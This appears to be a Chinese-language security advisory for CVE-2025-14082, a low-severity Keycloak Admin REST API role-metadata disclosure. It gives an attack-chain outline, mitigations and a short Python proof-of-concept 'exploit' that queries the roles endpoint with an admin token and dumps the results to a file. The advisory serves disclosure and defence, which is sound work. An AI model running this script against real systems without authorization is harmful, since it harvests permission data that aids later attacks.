CVE-2025-14082 Keycloak Admin REST API 敏感角色元数据信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14082

漏洞类型

敏感信息泄露

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Keycloak Admin REST API

漏洞概述

CVE-2025-14082是Keycloak身份认证服务器中的一个信息泄露漏洞。该漏洞存在于Keycloak的Admin REST API的授权检查机制中，由于对/admin/realms/{realm}/roles端点的授权验证不足，攻击者可以获取敏感的角色元数据信息。Keycloak作为企业级身份和访问管理解决方案，广泛应用于SSO（单点登录）和权限管理场景。攻击者利用该漏洞可以在未经适当授权的情况下访问受限的角色信息，包括可能包含敏感描述、权限配置等元数据。虽然该漏洞的CVSS评分较低（2.7），但泄露的角色元数据可能为后续攻击提供有价值的情报信息，帮助攻击者更好地理解系统架构和权限模型，从而为更复杂的攻击做准备。该漏洞需要高权限认证才能利用，但这并不意味着风险可以忽视，因为拥有管理员权限的用户可能通过该漏洞获取超出其角色范围的敏感信息。

技术细节

该漏洞的技术根源在于Keycloak Admin REST API对/admin/realms/{realm}/roles端点的访问控制存在缺陷。在正常的授权模型中，不同权限级别的管理员应该只能访问其职责范围内的角色信息。然而，由于API在处理角色元数据请求时没有充分验证请求者的权限范围，导致即使是非超级管理员用户也能获取敏感的角色元数据。具体来说，当攻击者（拥有一定管理权限的用户）向Keycloak Admin REST API发送针对特定realm的角色列表请求时，API会返回完整的角色元数据，包括角色描述、属性等信息，而这些信息本应该对非授权用户隐藏。攻击者可以通过标准的HTTP GET请求访问该端点，无需特殊的攻击工具或技术。响应中包含的角色元数据可能揭示系统的安全架构、敏感角色名称以及权限配置等关键信息。建议管理员审查API访问日志，识别异常的角色查询行为，并应用供应商发布的安全更新进行修复。

攻击链分析

STEP 1

1

攻击者获取Keycloak Admin REST API的有效访问令牌（需要高权限账户）

STEP 2

2

攻击者构造针对目标realm的/admin/realms/{realm}/roles端点的HTTP GET请求

STEP 3

3

Keycloak API由于授权检查不足，返回包含敏感角色元数据的响应

STEP 4

4

攻击者分析获取的角色元数据，包括角色描述、属性等信息

STEP 5

5

利用泄露的权限架构信息为后续针对性攻击做准备

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-14082 PoC - Keycloak Admin REST API Information Disclosure
# Description: Insufficient authorization checks on /admin/realms/{realm}/roles endpoint
# allows disclosure of sensitive role metadata

def exploit_cve_2025_14082(keycloak_url, realm, access_token):
    """
    Exploit for CVE-2025-14082: Keycloak Admin REST API role metadata disclosure
    
    Args:
        keycloak_url: Base URL of Keycloak server (e.g., https://keycloak.example.com)
        realm: Target realm name
        access_token: Valid access token with admin privileges
    
    Returns:
        JSON response containing role metadata
    """
    
    headers = {
        'Authorization': f'Bearer {access_token}',
        'Content-Type': 'application/json'
    }
    
    # Vulnerable endpoint - /admin/realms/{realm}/roles
    url = f"{keycloak_url}/admin/realms/{realm}/roles"
    
    print(f"[*] Target: {url}")
    print(f"[*] Realm: {realm}")
    print("[*] Attempting to retrieve sensitive role metadata...")
    
    try:
        response = requests.get(url, headers=headers, timeout=30)
        
        if response.status_code == 200:
            roles = response.json()
            print(f"[!] SUCCESS: Retrieved {len(roles)} role entries")
            print("[*] Sample role metadata:")
            
            # Display sensitive metadata that should not be accessible
            for role in roles[:5]:  # Show first 5 roles
                print(f"  - Role: {role.get('name', 'N/A')}")
                print(f"    Description: {role.get('description', 'N/A')}")
                print(f"    Attributes: {role.get('attributes', {})}")
            
            return roles
        elif response.status_code == 401:
            print("[-] FAILED: Unauthorized - Invalid or expired token")
        elif response.status_code == 403:
            print("[-] FAILED: Forbidden - Insufficient permissions")
        else:
            print(f"[-] FAILED: HTTP {response.status_code}")
    
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
    
    return None


# Example usage
if __name__ == "__main__":
    # Configuration
    KEYCLOAK_URL = "https://keycloak.example.com"
    REALM = "master"
    ACCESS_TOKEN = "your-admin-access-token-here"
    
    # Execute exploit
    result = exploit_cve_2025_14082(KEYCLOAK_URL, REALM, ACCESS_TOKEN)
    
    if result:
        print("\n[*] Exploit completed - sensitive metadata retrieved")
        # Save full response for analysis
        with open('role_metadata_dump.json', 'w') as f:
            json.dump(result, f, indent=2)
            print("[*] Full data saved to role_metadata_dump.json")

影响范围

Keycloak Admin REST API (all versions prior to vendor patch)

Red Hat Single Sign-On (affected versions per RHSA-2026:6477 and RHSA-2026:6478)

防御指南

临时缓解措施

在应用官方补丁之前，可采取以下临时缓解措施：1) 严格限制拥有Admin REST API访问权限的用户账户，仅授予必要的最小权限；2) 在API网关或反向代理层面实施额外的访问控制策略，过滤异常的API请求模式；3) 启用详细的API访问审计日志，实时监控对/admin/realms/{realm}/roles端点的访问，及时发现和响应可疑活动；4) 审查现有的管理员账户，撤销非必要的API访问权限；5) 考虑临时禁用非必要的角色元数据返回功能（需评估对业务的影响）。建议尽快应用官方安全更新从根本上解决该漏洞。